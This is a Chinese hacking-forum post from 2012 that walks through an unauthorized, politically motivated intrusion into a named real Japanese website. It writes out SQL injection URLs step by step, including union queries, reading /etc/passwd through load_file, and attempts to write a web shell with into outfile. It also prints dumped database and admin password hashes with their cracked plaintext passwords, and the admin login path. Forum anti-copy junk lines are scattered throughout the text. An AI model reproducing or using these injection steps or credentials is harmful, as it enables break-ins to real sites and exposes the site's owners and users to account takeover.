中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
, W5 o/ h- m0 V
- D$ J, Q% e; G8 e2 v2 w
0x01. 检测
www.zuaa.jp
收集数据
! A" Y$ O1 }+ T+ M0 a) [ D
[attach]73[/attach]
8 |- \, _5 y) q$ H4 p' r4 M/ K! h" S$ I
& ?% ~6 ^7 C/ ?+ H' N$ B# d
whatweb
9 x. ^: \$ b& Y
[attach]74[/attach]
0 f- _% O7 b* |- p
x W, f2 Q u0 G' I8 H8 T. b
利用NMAP扫描
Y; R0 Y5 R% Q% @$ v* K
[attach]75[/attach]
5 A' C3 }% M/ m9 \/ I
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
# K4 `. e: g/ b# [7 i9 E3 s
0x02.找注入点
" Z Q ?/ w$ b6 A
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
* {7 A a/ b5 e! _% g. |
[attach]76[/attach]
0 U0 S1 q, W+ H0 P6 A" }5 T1 Q
6 V: i, k# A- g7 N9 [0 D2 ~: \0 I5 }
0x03.order by
) H1 k9 ]( z1 U
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
, {6 [/ m7 f2 z: x
[attach]77[/attach]
- `1 [! K0 ]& A. }' g' O1 u
order by 28报错,order by 27正常
) W1 X2 j8 |% l
. i- u9 [6 K( Z* `5 s$ l9 W
0x04. union手动查询
- f- x6 O3 L8 f& A) W$ U" I0 \: a
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" r% Z ~6 B( i# p; d _! W' q
添加到 27 时正常显示
- B* y0 t0 A; |& H7 U4 `$ I4 F; ?
[attach]78[/attach]
1 m1 n) d& q3 Z* {+ r4 A
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
; {1 s( k. ]4 m$ T
v Z4 r+ i! ]: L( L' v
0x05. info:
9 p3 ?# x! |: ^. b. G( T+ A$ h1 y# k
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
6 Y6 @# s" P. A0 k4 i
[attach]79[/attach]
$ g- g3 K) q, X3 s( c
user: root@localhost
. `7 t1 }; b* p8 r
database: openpne
5 H7 p- Z/ N M8 w
version: 4.1.22
" j* } I, m$ P
os: portbld-freebsd5.4
" g8 S; f+ Q+ R& }( x D1 V j( b
4 |" T% w; Z: B2 ?' ?$ w" ] i
0x06. root用户
6 ]! c2 n2 d7 W+ X4 ]
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
! U1 O1 P( }6 T, m9 Z/ _3 A
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; `( E9 [4 [; b0 Z9 _8 J7 {3 b+ Y" T
[attach]80[/attach]
6 G" t! g% U( F2 Y# T
通过工具转换
8 y* _2 [+ O0 B
[attach]81[/attach]
( U( I4 b& }! W3 `: o
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
; y4 E2 f S. E0 d+ ^" P5 E6 S- g6 E1 i& L
& @$ }: K% I# i! m9 k/ j, h7 m
0x07. 利用 into outfile
% ?& ~7 H2 ^; |1 l. M3 h7 B
全部都失败
, Z& S- v) A) ?0 U+ B. N8 k
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
1 Z7 Z6 e6 M6 I7 b* q# B$ K
( G( B2 N9 j |$ V# [4 ?3 t& q3 T% T
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
7 D5 y. U6 h/ ]0 Y4 n- U( x' k
~1 F$ I& j i8 b( [7 H
页面显示“MDB2 Error:syntax error”
* ]/ `3 {! v; o8 c4 Q8 H
$ F. {( s) P4 D/ J- h
0x08. 利用 mysql 4.1
8 h0 G1 a' s* c% S5 J/ k- l% @
猜常规表名,字段未果 工具 sqlmap
0 x8 l/ ?3 B* a5 p: j
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
/ x/ A1 ]$ f1 \; `* z" b
( {" C2 Q) C8 l, q( i3 Y3 A
[attach]82[/attach]
, t1 X0 X2 J9 [' D/ d, z. [- C
7 Y& M# n" Q$ Y* c
0x09. 查找后台
0 f7 H% _# ~' _ {( ^- j
利用 现有的各种 后台工具尝试都不行
1 i4 U, `- w2 K6 I, b* @
3 e' }- H; K. L/ c0 O9 i
0x10. MySL外联方法
* X2 D" @9 j5 W
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
$ l: [+ {( [2 m
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
# Z* s2 h% V7 Q) f$ Y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
# r1 `/ o2 K; f
[attach]83[/attach]
4 U% o G( e0 U+ k
这个可以在
www.cmd5.com
解密
1 h( M* ], u- [! P( k
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
2 g) }+ v9 u' e/ F3 f
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
1 M2 t0 d2 v$ U5 u9 ]0 ]7 F
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
* }: G$ K* x% M, `1 D
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
: f1 O* O- T/ m! T4 `( I
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
! ] I8 ?% b& o: H6 |
[attach]84[/attach]
6 X2 a" b0 I5 A: s; m
2 P- F! g! Z s( ]% ~
0x11. 网站突破
/ m9 k+ _; r' e" G- ]6 {& y
发现网站的源程序 openpne, google 下载 openpne 源码
, d+ y% Q5 G1 y- Z, U
[attach]85[/attach]
- @$ O6 l! [7 ?" {
2 ~5 M: {% e+ A+ [ {! z( w1 \; N
0x12. 默认信息利用
. S2 B" K6 x9 b: s) e- Y' W
http://sns.zuaa.jp/?m=admin&a=page_login
1 N8 x9 J* R4 V! z
[attach]86[/attach]
7 P- r* d. k2 J7 o! f; E
表名 (c_admin_user) ,字段名(username,password)
4 L% X' ~( f" U+ F$ k- N& F
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
* d s% f$ n, S2 W2 ~ E
[attach]87[/attach]
+ r% I3 O: f1 d( T& T
解密
6 ]2 H# D' s& ^2 `2 z
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
& K" X9 O! W( u; Z% U
zuaajp:c0923ec5857796a393da99905008c176, zju1897
( T1 H, j; l* C3 N1 h* _0 H) e
0 }* S$ O# c% L& C! b: y. L& R( v) d
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
4 F* k0 I! W- `" B: p
]4 @9 W: C1 ~- q
0x13. 登录后台
\: P! t2 |0 S: T3 x4 @2 }) y
[attach]88[/attach]
+ c; D$ L5 l; F" L8 t! Z. h
" _5 J. M3 T, c; r
3 P3 T2 S# N/ @! L8 `; L8 p
0x14. 小结
' b& U4 _8 i* D- l% Z3 K+ g m
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
' C, B* T( Q# e& o4 w" t
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
0 v3 M* ^( [. _8 B+ m5 J1 @4 y6 m
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
9 V* O$ H `+ Y" l
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
9 I2 E0 j# R% O
8 W' A2 @2 Y; @3 z
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
1 L5 P) ]- m6 w
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2